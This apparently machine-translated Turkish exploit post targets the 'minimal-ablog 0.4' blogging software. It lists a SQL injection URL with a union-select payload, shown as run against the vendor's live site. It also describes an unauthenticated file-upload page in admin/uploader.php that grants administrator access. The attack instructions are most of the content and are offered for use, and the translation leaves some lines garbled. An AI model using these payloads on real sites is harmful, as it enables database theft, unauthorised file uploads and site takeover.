Yazılım: minimal-versiyon 0.4 ablog
Satıcı: http://www.abweb.co.cc/
Download: http://code.google.com/p/minimal-ablog/downloads/list
==================================================
[O] Savunulması dosya
index.php
admin / uploader.php
[O] Exploit
[SQL Enjeksiyon]
Http://localhost/ [path] / index.php? Id = [SQL]
http://www.abweb.co.cc/index.php?id=-3% 20union% 20select% 201, sürüm () ,3,4,5,6,7,8 - <=- demomuzu
[Dosya Yükleme]
http://localhost/ [path] / admin / uploader.php <=- burada dosya yükleyin
http://localhost/ [path] / / [your_file img] <=- dosyası burada yüklenmiş olacak
[Yönetici Bypass]
açtığınızda yönetici / uploader.php dosyasını yüklemek için zaten çok yönetici privs var:)
Hiç yorum yok:
Yorum Gönder